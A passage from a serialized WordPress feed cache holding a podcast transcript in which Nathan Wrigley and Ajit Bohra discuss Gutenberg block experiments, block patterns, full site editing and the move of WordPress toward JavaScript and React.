quicker.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>When we began our conversation, talking about what we were going to discuss in this podcast. You mentioned that you&rsquo;re involved personally, I don&rsquo;t know whether this is something to do with the business, or if it&rsquo;s just personal playing, you mentioned that you were involved in building some experiment, mental things in the block editor. Just curious if you could tell us what it is that you&rsquo;ve been up to?&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:15:50]</div> <div class=\"chat-text\"><p>Yeah. So I have been planning on that lately, but I haven&rsquo;t been getting time, but there are a lot of experiments that I have worked on. There&rsquo;s a lot of blog blog blog, we have been talking around. So I have named the project, blah, blah, blocks. It&rsquo;s a sarcastic name, yeah blah-blah-blah blocks. It is not something of a blog pack or anything. It is not intended to create a library. It is just experimental to let people know that this is something that you can do and build. So whatever random ideas that I get, or the random ideas I get from a team while working on different projects. So just write it down that this is something that we can build someday, or maybe we can, kind of experiment. So there are a couple of things that I have been experimenting with blocks. So blocks are not the only thing because a lot of people have been looking at Gutenberg from a block perspective and blockss have been the poster child of Gutenberg. But block is not the only capability that Gutenberg provide. Apart from blocks, if you look at it, we have patterns, we have variations. We have a rich text format, which have a lot more potential, even block extensions is another category where people can explore. Like we always look at block extensions. There are only a handful of developers that I have been following who are actually, kind of creating block extensions, where they are extending the capability of the core blocks and everything. So that&rsquo;s an interesting area. So I&rsquo;ve been working on a few of them. I remember creating a couple of blocks where, for example, if you add color code to your editor, so it just displays a hashcode. So that is a format that I have worked on, which create a color token out of it. Like how you look into your color editors. If you paste a color code into a vs code, it will actually display a small icon with the color of it, it will actually show the preview. So that kind of format that I have created, and I&rsquo;ve created this format for a sound seed format, where you can attach an audio on top of text and display a play button. And lately I&rsquo;ve been working on another experiment where you create a list or using a list block, and what if you want to convert that list into a to do list? Where it stores now, like you can literally click on it and it will strike off the item. For example, if I&rsquo;m creating a conference checklist you know, this is a speaker application checklist, and these are the five items that you need to do. And I want to give user capability that they can just click on it and it was strike off and it was store into that local store saying that, okay, this item is completed. I&rsquo;m working on that block extension also with kinds of convert the list block into a to-do list block. It&rsquo;s like without creating a new block, we are just utilizing the list block and extending it. So these are the different experimentations that I&rsquo;m working on. So just to give an idea, and food for thoughts to people out there that there&rsquo;s a lot more that you can do with editor, you can just be creative.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:18:22]</div> <div class=\"chat-text\"><p>I do love the idea of building on top of the core blocks and changing and adapting them in the way that you&rsquo;ve just mentioned with your to-do list. Really interesting. You mentioned block patterns and I have to say that this is something I&rsquo;ve made really good use of. I&rsquo;m extremely confident that the block patterns are going to become something that many people will make use of. In my case, I repeat a similar format in content that I produce. It has a title, it&rsquo;s often got an introductory paragraph and I find myself retyping the same thing over and over again. Or at least I did. And so I&rsquo;ve been creating and saving away block patterns, which essentially create templates for my work. And I can see this being useful all over the place, having complicated layouts and saving things that you wish to use over and over again, and possibly even a marketplace that could spring up around block patterns were pre-configured things that many people would like to have, hero images and so on. And I can just see a few of those starting to come into the marketplace. There seem to be a few players trying to get their block pattern packs, If you like&hellip; noticed. I feel this is a really good area for growth in the future.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:19:32]</div> <div class=\"chat-text\"><p>So I have seen Justin Tadlock has been doing great work, that block pattern he has been doing and putting it up, putting up on Twitter. So there&rsquo;s a great lot of pattern he&rsquo;s worked. I loved it. I remember working on a project recently where the team needs a lot of landing pages for black Friday sale. There is always a struggle between, the content team, the design team and everything. But patterns are the lifesaver. You just talk to the design team, create certain patterns, give to the content team and they are happy editing the content. There is a separation of concern also design team works on the patterns, content team gives them like, this is the content and this is going to be, and then finally give it to the content editing team. So I guess with patterns, we are enabling people to have certain kind of process and protocol, which was not possible with the classic editor, because everything was mashed up.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:20:17]</div> <div class=\"chat-text\"><p>Moving on staying with Gutenberg and the whole block editor, but now talking, instead of talking about the functionality of it, just talking about the implementation of it and how it&rsquo;s come about over time. There seems to be right at this point, we seem to be at some kind of inflection point where people are discussing whether or not it&rsquo;s going in the right direction, whether there&rsquo;s enough involvement. Whether people&rsquo;s voices are being heard. Perhaps people are saying it&rsquo;s going too slow, it&rsquo;s not moving at the speed of commercial page builders. And I&rsquo;m just curious what your thoughts are on that. Now it may be that you don&rsquo;t have any thoughts on this, but I&rsquo;m just interested to know whether you think the project is going in the way that the community wants it to go. Perhaps you&rsquo;ve got some personal experience of that. But also whether you think it&rsquo;s going only in the direction of a tiny subset of people who have the time, energy or capacity to actually tell what it is that they want to be built in the future.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:21:14]</div> <div class=\"chat-text\"><p>So I&rsquo;ve seen a lot of comparisons have been drawn Gutenberg with the commercial page builder, but there is a fundamental difference because I find this comparison a little floored. Because when we talk about commercial product and community projects, they work in a different way in a different fashion, and how decisions are being taken. In a commercial project, if we talk about any page builder they have you know, a limited set of decision makers. They will just put out the product at the pace they have decided they will have a clear guidelines. So everything is isolated in terms of development. So they&rsquo;re now going to work on core features and being able to put across and all of these commercial products have taken like four to five years to stabilize themselves, roughly around four to five years for Gutenberg also. And Elementor has taken a lot more time where they are right now. Like it&rsquo;s more elegant way before. And if we do the plus and minus, we can see, they have invested lot more years into the development. So obviously they are going to be way ahead of what Gutenberg is right now.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>If you look at it, initially, all this page builder started working with the PHP and everything. And eventually later on, now they are going into the JavaScript, where Gutenberg itself started with the JavaScript itself because they knew they want to give an experience on the client side, and that JavaScript has to come into it.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:22:28]</div> <div class=\"chat-text\"><p>It&rsquo;s also curious as well, the way that these different commercial page builders are set up, I think allows them to iterate more quickly. Not only do they not have to worry about the backwards compatibility of core, they only need to worry about the backwards compatibility of their plugin and the ecosystem that they&rsquo;ve developed. But also they have a smaller audience and so they can probably poll them and ask for their opinions and be a little bit more decisive about what it is that they need to build. Whereas I feel the core project, it does have to be backwards compatible, and also it has a giant audience of, let&rsquo;s say 42% plus of the web. So they need to be very mindful. And it&rsquo;s something that I keep saying over and over again, when the audience is that large, it must be very difficult not to have paralysis about what it is that you&rsquo;re going to introduce and so on. So yes, I can. Understand that.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>Let&rsquo;s move on. Let&rsquo;s change tack a little bit. And let&rsquo;s talk about full site editing. Now full site editing, we&rsquo;re in a really difficult moments because we know that it&rsquo;s coming. We can sense that it&rsquo;s coming. There are bits of it, which are now available to us, but it&rsquo;s very limited. We can modify only certain bits and we&rsquo;ve got a roadmap, and so we know what&rsquo;s coming. I&rsquo;m just curious as to what your thoughts are on full site editing. Do you think this is an important milestone for WordPress?&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:23:51]</div> <div class=\"chat-text\"><p>Yeah, this is definitely an important milestone because that is always a comparison between the page builders that we have in market. And most of them cater with the full site editing where if you can control the header, footer, global styles and everything. And that&rsquo;s the reason where people feel Gutenberg is lagging. And once the FSE comes in, I guess it is going to, kind of also reduce the fragmentation that we have right now between the PHP. If you want to create a theme, okay, you can create blocks, but you don&rsquo;t have complete control of your website in terms of block-ifying everything. But when FSE comes into picture, you are in complete control of the website. So right now it is mainstream where a lot of people are actually using it on the live site. There are also certain people, which are, they are experimenting with the FSE. But again, if you look at the FSE, the mindset of the people is still in the old implementation of themes. You know, they still think that hierarchy and everything, but FSE changes a lot of stuff. I have seen a lot of videos, a lot of people talking about how it is changing or creating a confusion on FSE, and confusion only happens when you see something new and you expect that new thing to be functional and similar to what you have seen past. It is new for a reason that there is going to be a different implementation. And if you honestly ask me, FSE is doing what actual themes were supposed to initially do, like the job of theme is to give you a foundational thing where you have a base layout, you have your design system place where you say that this are my fonts, these are my colors, and this is my master layout. And this is the building. Now you just craft your content and create all this stuff. So FSE actually enables you with that. If you look at classic themes, there is a lot of stuff that developers have to do. Like they have to look after not creating and handling the global styles. Looking after the topography, looking after all the designs and layout, like they have to do a lot of work on the code. But with FSE it is like, you don&rsquo;t focus on this stuff. You just focus on the design elements. As a theme developer your job is to actually work on the look and feel, not on the small nitty gritty. They are giving you the building. So for me, Gutenberg is more of, laying down a lot of processes for the community, how they work, in terms of how you craft your content, how you write your content, how you design your themes. It is redefining the processes. So rather than looking at Gutenberg as just a way to edit your content, we should look at it in a way where we have a certain process and protocol in place, how we use our WordPress website or content editing experience. And we should look at Gutenberg as a way to redefine those processes. We can say, now we are getting a different set of processes, which are more refined and which are more optimized. We have to just unlearn the old process and get into the into the new process. And that is going to open up a lot.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:26:33]</div> <div class=\"chat-text\"><p>Yeah, that&rsquo;s a really interesting point. And I was trying to think about wordPress from the perspective, this was the other day. I was trying to think about what it would be like if I was fresh to WordPress and I&rsquo;d never used it before. And also I had no experience with any kind of software. I&rsquo;d never had a website. I have no expertise in anything to do with putting content on the web. And so I was trying to think to myself what, what is it that I would want. The full site editing what&rsquo;s promised is exactly what I would want. I would want to be able to set things up, set some basic global styles, pick some fonts, pick some colors and so on, and then to be able to create my menu. And I would be wanting to do that in one place. In one part of the overall software, I wouldn&rsquo;t want to be having to go over to this different section, modify things, save things, go back and check things. I would wish to do it all in one space. And I think you&rsquo;re right. The idea of modifying the workflow, if you like modifying the workflow so that everything is easy for non-technical people out of the gate is the goal so that we can continue to democratize publishing, but we are in a transient period where the old things have to be adapted, perhaps replaced and the new things have to be accepted and it&rsquo;s going to be a bumpy ride, which of course leads to the problems that we&rsquo;ve got at the moment where there seems to be confusion, and in some cases, people are a little bit, perhaps even upset because of the way things are happening. But I guess change is going to be needed in order to make the content management system usable by people in the future. By having one interface for everything.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:28:16]</div> <div class=\"chat-text\"><p>And a lot of people think that FSE is going to kill themes. Let me tell you it is not killing themes are not going anywhere. Technically FSE is helping team developers. If you look at any marketers, you can see if you pick five different themes, those five different themes are done in a different way. They have a different set of page builder. They are either tied up with a third party page builder, or they have their own custom page builders. They are using customizer. There&rsquo;s a lot of work they are doing just to get the basics of theme setup done. But after FSE and it will make theme developers and theme shop jobs easy, because now they don&rsquo;t have to maintain their own version of, maintaining design systems and everything because Gutenberg is I like, I know you need all this stuff. So let me give you all this in core and standardize this for you. So Gutenberg is going to extend the rise the overall process of themes, and rather than working on those core sectors, you just focus on theme. If you want to create a university theme, so you create the color palette, you create the theme, you create, you just define the font size into the theme json files and you ship the required patterns that are required for a university website. So you are now working on the content. So rather than building your car from the ground, you are saying, okay, I have my engines and bonnets and everything ready, I just need to work on the body color and the interior. That&rsquo;s it. So you are getting semi build cars for your themes. So themes are there. They are not going to die.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>And my phrase throughout the day when I started working on the Gutenberg is you need to unlearn to learn. And that is the important when there is something new out in the industry where you are working, you have to often unlearn, because you cannot sit there and say that we have been, using this for 10 years. It&rsquo;s okay. 10 years things have to redefine.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:29:55]</div> <div class=\"chat-text\"><p>Yeah, good point. One of the things which causes the disagreements in the community or the upset that we&rsquo;ve got from time to time is simply that this can&rsquo;t happen overnight. It can&rsquo;t be just okay, finished in the background. Let&rsquo;s just throw it into the next version of WordPress. It does need to iterate. And I liken it to imagine I&rsquo;ve got a house and I wish to have an extension built onto the side of my house to increase its size and make my house more desirable. There isn&rsquo;t some sort of Jack and the Beanstalk magic beam that you can throw in the ground and sprinkle water on it, and suddenly I&rsquo;ve got an extension. I have to go through a process of watching the house being built and everything gets messy. There&rsquo;s dust everywhere. Bits of my walls need to be knocked down to make it happen. And eventually after a period of time, when everything is finished and tidied up, the house is better, but there was a process that I had to go through, which was a little bit difficult in the meantime. I don&rsquo;t know what you think about that analogy, but that&rsquo;s the way I&rsquo;m thinking about where we are right now. We&rsquo;re in the process of building something, adding something new. It&rsquo;s difficult, but it has to be difficult.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:31:03]</div> <div class=\"chat-text\"><p>Yes, because if a lot of people have argument that it should have been plugin. It was a plugin for quite a good amount of time and which kind of, enabled the team to gather feedback. But eventually you someday you have to put it in the core and you cannot wait for five years and say that now we are going to put it into core and test. Because the moment you add things to the core, one is it increases the adoption and you get like a lot more clear feedback. It is very crucial for it to land in the core. And even if you look at it, it landed in the core with a small set of features where they only focused on the editing experience. Like they only replace the editor. I can say that, no, it is not perfect, but yeah, you have to do it someday. People say you should stabilize it because if you talk about stability and perfection, they are very subjective. If you take 10 people and ask a view about Gutenberg, I&rsquo;m sure a lot of people will say, this that is perfect. A lot of people with that, this has just started. Perfection, stability are very subjective, a lot of, a lot more people, a lot more voices, and we can never say what is perfect. People complain about these things. I guess period is going to be slow. There are two reasons. One, there are a lot of people involved. There is some central decision making, but still it is a community project where a lot of people talk about it, they write issues and have people speak about it. It is shared on the Slack. So it kinds of creative friction and resistance. We have a set plan, but to move slow, it is a community project. We have to take care of good compatibility. So for example when working on the FSE, FSE is going slow. While working on a team realizes that there are a lot more changes that needs to be done into the core API&rsquo;s. If you look at the blocks API, they are lot more flexible. Like we previously didn&rsquo;t had option for design tools you know, defining padding and everything. So they realize, okay these options are required on the block to enable FSE. There is an argument that team will have thought about implementing this, but you cannot startup, adding ten different options in first place. Like a lot of commercial page builder, they work in a template fashion where they add all the option in one go. But in Gutenberg approach, if you see we are starting with a minimal set of features and flexibility, we are not giving all the options to user. They are slowly added and iterated in a way where things are flexible. Things are backward compatible and then they don&rsquo;t even create a bloat also. So that is the reason why processes is a bit slow because we are looking for creating something, which is long-term sustainable.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:33:23]</div> <div class=\"chat-text\"><p>Yes. Good point. I guess if you are after this being quick, then it&rsquo;s likely to be poorly implemented if we rush it, but I can well understand the arguments of people who feel that the pace of change is not necessarily as, as quick as they would like, but I guess we just have to just hold on and see what the future holds.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>There&rsquo;s an interesting quote that I&rsquo;ve written down from Justin Tatlock, who obviously is with WP Tavern. He wrote the following in a blog post, which I&rsquo;ll link to, he wrote, &amp;quot;If WordPress must become more complex for developers to provide end users with this much power&amp;quot;, he was talking about full site editing, he says, &amp;quot;I can live with that&amp;quot;. And I think that&rsquo;s my position as well.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"> <div class=\"chat-text\"><p>Okay. Let&rsquo;s move on to our third and final section. Now, obviously in the future, WordPress has decided to become more JavaScript focussed. In the past, very much since the beginning, it&rsquo;s been all to do with PHP and template files and all of that stuff. Now we&rsquo;re moving into an era where new languages, new capabilities, new ways of doing things are possible. And so we&rsquo;ve entered this new era where React is taking over the heavy lifting for many of the things in WordPress. It does by definition, a little bit like we talked about just previously, it does mean that if in the future you wish to really get involved with WordPress and it&rsquo;s core, you will need to have those skills, sounds to me like you have embraced that and you&rsquo;ve decided to learn those things, but I&rsquo;m just curious how you think the WordPress community is handling this and what you have done to upscale yourself and learn these new things.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:34:59]</div> <div class=\"chat-text\"><p>So I still see a lot of people complain about it and they have resistance because they are thinking from the perspective of (?). And I have been a fan of Laravel also, I&rsquo;ve been active into that Laravel community, which is more a PHP focused, but I have seen how they embrace different technologies and where, when you are into different communities, you learn a lot.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>So it&rsquo;s good for WordPress developer also to hang out in different communities, in different technologies, also different perspective, and also help you grow. So a lot of people who say that they don&rsquo;t want to move to the JavaScript. Even if you have to admit we are not doing PHP also fairly good. We are using PHP in a limited scope because I see a lot of PHP developer, they are using PHP at a basic level. They are not moving up. And if you look at the core. The core has been slowly modernized in terms of PHP also. There was a time when there was a lot of functional programming, but we can see a lot of OOPs has been implemented. We have a lot of classes and even the way things are handled is way far better than what we had in the previous version of the WordPress.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>If you look at the developers right now, even on the PHP front also, they need to redefine. You need to step up your game. You need to get into the modern PHP. You need to start embracing the OOPs. You need to start embracing the dependency management. So I&rsquo;ve seen a lot of PHP developer also who have resistance, who don&rsquo;t even want to go and use Composer also to maintain the dependency.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>So these are the category of developers who eventually have resistance. Like they work on certain set of things and they are comfortable in there. The only problem is that comfort backfires you because that just stops your growth. And that&rsquo;s exactly the reason I have been extensively working in the past year, improving myself on the PHP front also, but when JavaScript jumped in. So I remember Matt saying that learn JavaScript deeply. So at that time I was like, at some point I will learn JavaScript, and I&rsquo;ve always been comfortable in the PHP area, but there are a lot of interesting stuff happening in the JavaScript arena. And I was like some days, some day, but eventually Gutenberg happened.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>I started getting involved in it and I was like, let&rsquo;s address the elephant in the room. So I started now, I took three months, a break from everything, isolated myself, and I started reading stuff about it. I was like, damn, this is interesting. Not bad. Once you start loving things and stop hating it. Now, you open a lot of doors and don&rsquo;t look JavaScript from the perspective of WordPress. The biggest mistake that we can do is as a developer is if you are working with WordPress and saying, now WprdPress needs JavaScript, I need to learn. No, rather look at it from a distant, different perspective and say that, now there&rsquo;s a lot of JavaScript that is in general being used outside. Which you can explore and embrace. So there might be case when you start working on React or JavaScript and WordPress being the reason, and you ended learning a new skill. And then you realize, oh, now you can work on a lot of stuff outside of WordPress also. So WordPress become the teacher who&rsquo;s pushing you to learn something new, and that completely changed things for you. So right now I&rsquo;m working extensively with React, NodeJS, working with clients and on the complex projects where I remember working on a completely different mobile app built on React, native Electron app, a PHP generation tool, complete written on NodeJS. All this was impossible previously. Gutenberg being an entry point for me to enter into this, it helped me.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>I have seen a lot of developers who embrace the JavaScript and React because of WordPress. And now they are into a full-time React and JavaScript development. They are enjoying working with different kinds of projects. They are working on their pet projects. They are ended up getting paid better because of their increased skillset in React and JavaScript, because React and JavaScript have a good market share. There are a lot of jobs out there paying well for you. So there are a lot of reason for people to learn React and JavaScript, not just because WordPress is introducing it, but it is going to help you.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:38:43]</div> <div class=\"chat-text\"><p>Staying on the WordPress side of JavaScript, I&rsquo;m just wondering if you can perhaps explain some solid examples of where you feel WordPress will improve because it is using JavaScript instead of the way it&rsquo;s been doing things with PHP in the past. It always strikes me that we&rsquo;re always told, learn JavaScript deeply, it&rsquo;s the future and so on. But very often that doesn&rsquo;t come along with an argument as well, this is the reason, here&rsquo;s a concrete example of why it&rsquo;s going to be.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:39:16]</div> <div class=\"chat-text\"><p>So the reason if you look at WordPress core itself, and if you look at the entire history slowly, slowly, there are a lot of components that are slowly been transitioned to the JavaScript. There&rsquo;s a lot of JavaScript that is written into the core, core base. And so far people have never realized we are interacting with a lot of JavaScript code in core. But that&rsquo;s all behind the door. It has never been the front facing into the developer arena. So we never realized that we are working with JavaScript. So even if you look at customizer, I don&rsquo;t think a lot of people use customizer, but there is a lot of JavaScript involved when you&rsquo;ve worked with customizer.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>If you work with the media uploader, there is a lot of JavaScript involved. There is a backbone JS that is behind the scene, which you can use. So already there is a fragmented, JavaScript implemention in the core. So we have been slowly, already adopting JavaScript. Even if you use jQuery, I just put it in the category of JavaScript because you are just doing a library. So we are using JavaScript already, but rather than using a different mashup of them, like using backbone or different things, now we are standardizing and seeing that this is how our JavaScript is going to work. So for me, again, even if I look at, from a development perspective, in terms of JavaScript, you&rsquo;re also putting a protocol and you&rsquo;re getting a standardization, like rather than using this and 10 different things. We are giving you a set of components, a set of helper functions and everything which you can use and build your own stuff. So Gutenberg is a foundation for the front end experience and also for the backend development and processes also, like here they are giving you blocks and everything to craft your content. In terms of front-end usage. In terms of development usage, they are giving you as a theme builder, they are giving a themes for the right person. And if you go further, down a lower level, they are giving you this handcrafted components and everything with React to build things.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>Eventually this is going to spread across the code base. I feel we are just started with the small section. We can see that it is going to span across the different area of admin area. WP admin is going to be invaded by the React and JavaScript. Because it is going to be re-used. So it&rsquo;s better that, start embracing the JavaScript and React right now, rather than waiting for another two, three years down the line and then realizing, oh, now we have to like, you actually get into it.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:41:25]</div> <div class=\"chat-text\"><p>With that in mind, what do you make of projects, ACF blocks is one that comes immediately to mind, where, people are trying to create a nice bridge, the opportunity for people to do things in the way that they&rsquo;re accustomed to. So just to illustrate ACF blocks enables you to create your own blocks, but instead of getting involved in the whole, that the whole in inverted commas, normal way of making blocks, you can do it with reference to PHP and ways that you&rsquo;re perhaps familiar with. Do you feel that these are a good stop gap? They bridged the gap in the period of time where people are learning these skills or do you think actually it would be better if everybody just learned the stuff and moved on.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:42:02]</div> <div class=\"chat-text\"><p>So I guess they are good for people who are transitioning. You know, like they are good for now. It&rsquo;s not a clear yes or no, if you talk about ACF blocks and because I have seen projects, and even there are projects where I recommend people like, go ahead and use the ACF blocks. You don&rsquo;t have, that tailored requirement for creating something from scratch. It&rsquo;s a fairly small requirement where you just want certain input fields and that works. So in those cases, ACF is good. Even if you&rsquo;re transitioning, it&rsquo;s good. But if you look from a long-term perspective or if you have very complex requirement, I have seen that ACF blocks don&rsquo;t because there was one project where we have been working on where ACF blocks, but if you wanted to create a more controlled user experience, not using lots of other components. And eventually we have to deprecate the ACF implementation and that create everything from scratch and creating a handcrafted blocks using the core functionality.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"> <div class=\"chat-text\"><p>So if you have to just evaluate when ACF blocks fitting and when you have to use core blocks, but eventually core blocks are going to fair well because they always have access to the newer API. You have more control over it. And if you look at how APIs are transitioning, like if you look at the initial version of block APIs, that was a lot of code that you had to write. But now you write less code to create those blocks. You have CLI tools. You have a boilerplate APIs, very light have to just couple of lines of code to get things done compared to writing almost 5,200 lines in past. So I guess the development path on which APIs are working is also. If you look at the sort API, if I want a background support or gradient support on that, I just do define the support. But previously have to implemented that entirely. I guess start learning how to build blocks from scratch. All the third party solutions are a patchwork on top of what we have. So like it, it might be controversial, but yes. For me, it feels like a patch. You&rsquo;re like patching something. You&rsquo;re just trying to run away from something saying I&rsquo;m going to use.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:43:57]</div> <div class=\"chat-text\"><p>My final question then it leads perfectly on from what you were saying, it feel that the need to learn React, for example, is essential going forward. I don&rsquo;t know if you have any resources that you&rsquo;d like to mention or places, perhaps websites, anything in fact, which you found to be useful, which we could add into the show notes, which might enable people to get to the good stuff quickly.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:44:17]</div> <div class=\"chat-text\"><p>Even before people start working on the React, they need to get their basics clear in term of JavaScript. And there is a lot of arresting tutorial available out there, but I will, I like to recommend the one by the Wes Bos. Wes Bos have two JavaScript courses. One is JS for everyone, and JS for beginners. They are quite good material on the ES6 and everything on the build tools. Like it&rsquo;s a one-stop shop for you. You know, just get those two courses and you will learn everything in depth. Apart from that, if you are looking for resources on YouYube, there&rsquo;s is a good channel by Net Ninjas. This guy goes a lot of interesting stuff. Like you, you don&rsquo;t have to pay those, those are free of course. So these are the two good resources where you can learn ES. For the React also that you can refer the official documentation. They are best. Just go through it. If you are a person who likes to refer videos again, Wes Bos have a lot of videos on it and other resources that can decode. It is on Egghead. This is a free course. It is available there. You can just visit the website and learn the React for Beginners. He has epic React course, which is a more elaborated and detailed course, which you can go through. These other resources that you can refer, which are very good in terms of investing your time.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:45:26]</div> <div class=\"chat-text\"><p>Thank you. We&rsquo;ll make sure to add some of those links into the show notes so that people can access them. But I&rsquo;ve run out of questions that I would like to ask today. I&rsquo;m just mindful that we would people, if they wish, if they&rsquo;ve listened to this podcast and they would like to get in touch, I&rsquo;d like to provide them with a way to do that if you&rsquo;re willing. So if there&rsquo;s any best way of getting in touch with you, it could be Twitter or an email address or whatever you feel comfortable sharing. Go for it. Let us know.&nbsp;</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-2\"><div class=\"chat-author chat-author-ajitbohra vcard\"><cite class=\"fn\">Ajit Bohra</cite> [00:45:53]</div> <div class=\"chat-text\"><p>People can DM on Twitter, like a lot of people already ping me on DM for our doubts, queries and everything they have around Gutenberg. So it&rsquo;s been a couple of years I have been already helping people on the Twitter with the right resources if they need, or they have any doubts on queries around Gutenberg. It&rsquo;s @ajitbohra.</p>\n</div></div><div class=\"chat-stanza chat-row chat-speaker-1\"><div class=\"chat-author chat-author-nathanwrigley vcard\"><cite class=\"fn\">Nathan Wrigley</cite> [00:46:09]</div> <div class=\"chat-text\"><p>Ajit, thank you so much for coming on the podcast today. I really appreciate it.</p>\n</div></div></div></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 08 Sep 2021 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:102:\"WPTavern: WordPress 5.9 Proposed Scope: Major Push Towards Full-Site Editing, Plus a New Default 